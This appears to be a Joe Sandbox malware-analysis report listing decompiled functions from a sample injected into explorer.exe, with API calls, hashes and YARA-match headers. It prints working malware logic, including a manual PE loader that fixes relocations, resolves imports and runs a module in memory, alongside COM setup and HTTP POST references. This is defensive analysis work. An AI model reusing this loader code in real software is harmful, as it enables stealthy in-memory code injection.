                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af9fc
                                                                                                                                                                        0x007af8fe
                                                                                                                                                                        0x007af8bf
                                                                                                                                                                        0x007af9fe
                                                                                                                                                                        0x007afa01
                                                                                                                                                                        0x007afa03
                                                                                                                                                                        0x007afa06
                                                                                                                                                                        0x007afa09
                                                                                                                                                                        0x007afa09
                                                                                                                                                                        0x007afa12
                                                                                                                                                                        0x007afa14
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afa18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007afa18
                                                                                                                                                                        0x007af88e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 007AF7D7
                                                                                                                                                                        • memset.MSVCRT ref: 007AF7E8
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 007AF8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: a83df6c876044a1c3b207a8cb7faf52e0ae5d9d8052b8b394d773f9a256208e5
                                                                                                                                                                        • Instruction ID: 3fb89142b631352d7cc7a5102d28698b6f5881ead99856153f77ff3c0dad53ec
                                                                                                                                                                        • Opcode Fuzzy Hash: a83df6c876044a1c3b207a8cb7faf52e0ae5d9d8052b8b394d773f9a256208e5
                                                                                                                                                                        • Instruction Fuzzy Hash: E5A13B71A01218EFDB11DFA4DC88BAE77B8EF89310F108269F905E7260DB789E45CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B1464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 81ce7b408a547876594b29628a76b3cfc35a9fd64b4044da1df610377bf477c3
                                                                                                                                                                        • Instruction ID: 1534a3d01432a7b5239009b7ba7341132491e719338c537db21bca8f2e053817
                                                                                                                                                                        • Opcode Fuzzy Hash: 81ce7b408a547876594b29628a76b3cfc35a9fd64b4044da1df610377bf477c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 6EE18BB290020AFBDF219F64DC56FEF3B69EF54350F908024FE15D6141EA39DA619BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007ADE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007ADE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x7bc9a0);
						_t36 = E007A9A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E007A8BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                        0x007ade2f
                                                                                                                                                                        0x007ade36
                                                                                                                                                                        0x007ade39
                                                                                                                                                                        0x007ade46
                                                                                                                                                                        0x007ade4c
                                                                                                                                                                        0x007ade4f
                                                                                                                                                                        0x007ade51
                                                                                                                                                                        0x007ade56
                                                                                                                                                                        0x007adf2e
                                                                                                                                                                        0x007adf2e
                                                                                                                                                                        0x007adf2e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ade5c
                                                                                                                                                                        0x007ade5c
                                                                                                                                                                        0x007ade5c
                                                                                                                                                                        0x007ade5f
                                                                                                                                                                        0x007ade65
                                                                                                                                                                        0x007ade81
                                                                                                                                                                        0x007ade88
                                                                                                                                                                        0x007ade8e
                                                                                                                                                                        0x007ade92
                                                                                                                                                                        0x007adea6
                                                                                                                                                                        0x007adea6
                                                                                                                                                                        0x007adea9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ade94
                                                                                                                                                                        0x007ade94
                                                                                                                                                                        0x007ade99
                                                                                                                                                                        0x007ade9d
                                                                                                                                                                        0x007ade9d
                                                                                                                                                                        0x007adea1
                                                                                                                                                                        0x007adea2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ade94
                                                                                                                                                                        0x007adeaa
                                                                                                                                                                        0x007adeaa
                                                                                                                                                                        0x007adead
                                                                                                                                                                        0x007adeae
                                                                                                                                                                        0x007adeb5
                                                                                                                                                                        0x007adebf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007adec1
                                                                                                                                                                        0x007adec7
                                                                                                                                                                        0x007adecb
                                                                                                                                                                        0x007adf24
                                                                                                                                                                        0x007aded4
                                                                                                                                                                        0x007adee1
                                                                                                                                                                        0x007adee7
                                                                                                                                                                        0x007adee9
                                                                                                                                                                        0x007adef0
                                                                                                                                                                        0x007adef6
                                                                                                                                                                        0x007adefe
                                                                                                                                                                        0x007adf06
                                                                                                                                                                        0x007adf12
                                                                                                                                                                        0x007adf18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007adf2a
                                                                                                                                                                        0x007adeb7
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 007ADE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 007ADE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 007ADE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007ADEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 007ADF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 007ADF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 41b3a3d700c8e591c5fb09fbcab637836c3e89628b0dc86c4b23eaad495ad706
                                                                                                                                                                        • Instruction ID: 2edd1eeb9253dbe7eeab39bc38dca6c302c1b0b5ad944379a350fd1568667062
                                                                                                                                                                        • Opcode Fuzzy Hash: 41b3a3d700c8e591c5fb09fbcab637836c3e89628b0dc86c4b23eaad495ad706
                                                                                                                                                                        • Instruction Fuzzy Hash: BB31F271904116EADF34AB54C888FAEB7B8EF93311F108259F517E6064E7789E80CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AE656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AE66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007AE672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AE686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AE701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AE704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AE709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        • Opcode ID: 8ab24cb283a06ce51c2e3d62ee2e3a91514f4888b414e89d45e90025a8d31bce
                                                                                                                                                                        • Instruction ID: 30ef9bc4ef63ecbad4f6307420e39b66fc7563371772e7d61b16e4091cfb712e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ab24cb283a06ce51c2e3d62ee2e3a91514f4888b414e89d45e90025a8d31bce
                                                                                                                                                                        • Instruction Fuzzy Hash: 3921FBB5900218BFDB00DFA9CC88DAFBBBDEF89354B104599F505A7250DA75AE01CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B3D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E007B3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                        0x007b3d6f
                                                                                                                                                                        0x007b3d7c
                                                                                                                                                                        0x007b3d82
                                                                                                                                                                        0x007b3d8b
                                                                                                                                                                        0x007b3d8e
                                                                                                                                                                        0x007b3d91
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b3e82
                                                                                                                                                                        0x007b3e86
                                                                                                                                                                        0x007b3e88
                                                                                                                                                                        0x007b3e96
                                                                                                                                                                        0x007b3fb4
                                                                                                                                                                        0x007b3fb8
                                                                                                                                                                        0x007b407d
                                                                                                                                                                        0x007b4086
                                                                                                                                                                        0x007b4089
                                                                                                                                                                        0x007b408d
                                                                                                                                                                        0x007b4093
                                                                                                                                                                        0x007b409b
                                                                                                                                                                        0x007b409b
                                                                                                                                                                        0x007b40a3
                                                                                                                                                                        0x007b40b1
                                                                                                                                                                        0x007b40b4
                                                                                                                                                                        0x007b40b8
                                                                                                                                                                        0x007b40be
                                                                                                                                                                        0x007b40ce
                                                                                                                                                                        0x007b40f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b40fb
                                                                                                                                                                        0x007b40d4
                                                                                                                                                                        0x007b40e5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b40f3
                                                                                                                                                                        0x007b40f7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b40f3
                                                                                                                                                                        0x007b40e7
                                                                                                                                                                        0x007b40eb
                                                                                                                                                                        0x007b40f0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b40f0
                                                                                                                                                                        0x007b40d6
                                                                                                                                                                        0x007b40da
                                                                                                                                                                        0x007b40dc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b40dc
                                                                                                                                                                        0x007b40c0
                                                                                                                                                                        0x007b40c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b40c6
                                                                                                                                                                        0x007b3fbe
                                                                                                                                                                        0x007b3fc2
                                                                                                                                                                        0x007b3fc4
                                                                                                                                                                        0x007b3fd2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b3fd8
                                                                                                                                                                        0x007b3fe1
                                                                                                                                                                        0x007b3fef
                                                                                                                                                                        0x007b3ffb
                                                                                                                                                                        0x007b4007
                                                                                                                                                                        0x007b4010
                                                                                                                                                                        0x007b4013
                                                                                                                                                                        0x007b4017
                                                                                                                                                                        0x007b4019
                                                                                                                                                                        0x007b4026
                                                                                                                                                                        0x007b403a
                                                                                                                                                                        0x007b4049
                                                                                                                                                                        0x007b405a
                                                                                                                                                                        0x007b4023
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4023
                                                                                                                                                                        0x007b405c
                                                                                                                                                                        0x007b4060
                                                                                                                                                                        0x007b4065
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4065
                                                                                                                                                                        0x007b4070
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4072
                                                                                                                                                                        0x007b4076
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4078
                                                                                                                                                                        0x007b3e9c
                                                                                                                                                                        0x007b3ea5
                                                                                                                                                                        0x007b3eb3
                                                                                                                                                                        0x007b3eb6
                                                                                                                                                                        0x007b3ed3
                                                                                                                                                                        0x007b3eda
                                                                                                                                                                        0x007b3eec
                                                                                                                                                                        0x007b3eec
                                                                                                                                                                        0x007b3ef3
                                                                                                                                                                        0x007b3f03
                                                                                                                                                                        0x007b3f1b
                                                                                                                                                                        0x007b3f05
                                                                                                                                                                        0x007b3f0d
                                                                                                                                                                        0x007b3f0d
                                                                                                                                                                        0x007b3f1e
                                                                                                                                                                        0x007b3f22
                                                                                                                                                                        0x007b3f32
                                                                                                                                                                        0x007b3f55
                                                                                                                                                                        0x007b3f67
                                                                                                                                                                        0x007b3f34
                                                                                                                                                                        0x007b3f48
                                                                                                                                                                        0x007b3f48
                                                                                                                                                                        0x007b3f71
                                                                                                                                                                        0x007b3f8d
                                                                                                                                                                        0x007b3f73
                                                                                                                                                                        0x007b3f82
                                                                                                                                                                        0x007b3f82
                                                                                                                                                                        0x007b3f95
                                                                                                                                                                        0x007b3f9e
                                                                                                                                                                        0x007b3f9e
                                                                                                                                                                        0x007b3fac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b3ef5
                                                                                                                                                                        0x007b3ef7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b3ef7
                                                                                                                                                                        0x007b3ef3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b3eb6
                                                                                                                                                                        0x007b3d99
                                                                                                                                                                        0x007b3da7
                                                                                                                                                                        0x007b3dac
                                                                                                                                                                        0x007b3db7
                                                                                                                                                                        0x007b3dba
                                                                                                                                                                        0x007b3dbe
                                                                                                                                                                        0x007b3dc0
                                                                                                                                                                        0x007b3dd0
                                                                                                                                                                        0x007b3dd9
                                                                                                                                                                        0x007b3de2
                                                                                                                                                                        0x007b3dea
                                                                                                                                                                        0x007b3df3
                                                                                                                                                                        0x007b3dfe
                                                                                                                                                                        0x007b3e04
                                                                                                                                                                        0x007b3e07
                                                                                                                                                                        0x007b3e0a
                                                                                                                                                                        0x007b3e11
                                                                                                                                                                        0x007b3e18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b3e23
                                                                                                                                                                        0x007b3e31
                                                                                                                                                                        0x007b3e3c
                                                                                                                                                                        0x007b3e46
                                                                                                                                                                        0x007b3e5e
                                                                                                                                                                        0x007b3e6b
                                                                                                                                                                        0x007b3e6b
                                                                                                                                                                        0x007b3e48
                                                                                                                                                                        0x007b3e53
                                                                                                                                                                        0x007b3e53
                                                                                                                                                                        0x007b3e72
                                                                                                                                                                        0x007b3e72
                                                                                                                                                                        0x007b3e7a
                                                                                                                                                                        0x007b3e7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 007B3ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 007B3EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007B3F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007B3F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 007B4052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 1b6b54f28faaac744ff96398064933b1a8a2e96174a4fb465988ec3545b01749
                                                                                                                                                                        • Instruction ID: 1e73c632d7c9a74c6858052457249d31726d39e1768ebf2fa1c66ac3781fc49c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b6b54f28faaac744ff96398064933b1a8a2e96174a4fb465988ec3545b01749
                                                                                                                                                                        • Instruction Fuzzy Hash: 3EE18F74E04209DFDB14DFA8C984BEDBBF1FF08314F24856AE915AB251D738AA81CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AE400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E007AE400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x7bc868, 0, 1, 0x7bc878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E007A8BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                        0x007ae40d
                                                                                                                                                                        0x007ae410
                                                                                                                                                                        0x007ae413
                                                                                                                                                                        0x007ae424
                                                                                                                                                                        0x007ae42a
                                                                                                                                                                        0x007ae43b
                                                                                                                                                                        0x007ae443
                                                                                                                                                                        0x007ae494
                                                                                                                                                                        0x007ae494
                                                                                                                                                                        0x007ae499
                                                                                                                                                                        0x007ae49e
                                                                                                                                                                        0x007ae49e
                                                                                                                                                                        0x007ae4a1
                                                                                                                                                                        0x007ae4a6
                                                                                                                                                                        0x007ae4ab
                                                                                                                                                                        0x007ae4ab
                                                                                                                                                                        0x007ae4ae
                                                                                                                                                                        0x007ae445
                                                                                                                                                                        0x007ae446
                                                                                                                                                                        0x007ae44c
                                                                                                                                                                        0x007ae45d
                                                                                                                                                                        0x007ae462
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ae464
                                                                                                                                                                        0x007ae471
                                                                                                                                                                        0x007ae479
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ae47b
                                                                                                                                                                        0x007ae47d
                                                                                                                                                                        0x007ae485
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ae487
                                                                                                                                                                        0x007ae48a
                                                                                                                                                                        0x007ae490
                                                                                                                                                                        0x007ae490
                                                                                                                                                                        0x007ae485
                                                                                                                                                                        0x007ae479
                                                                                                                                                                        0x007ae462
                                                                                                                                                                        0x007ae4b3

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE424
                                                                                                                                                                        • CoCreateInstance.OLE32(007BC868,00000000,00000001,007BC878,?,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AE446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE471
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: c9c260d43bb958897c1676aece40122ed2497c5082e623f19fe9357f2320f37d
                                                                                                                                                                        • Instruction ID: 2274a6f7e3338f9b219dfc79a44a233041ebfd324dc7e7a7a84721c591b3f5a9
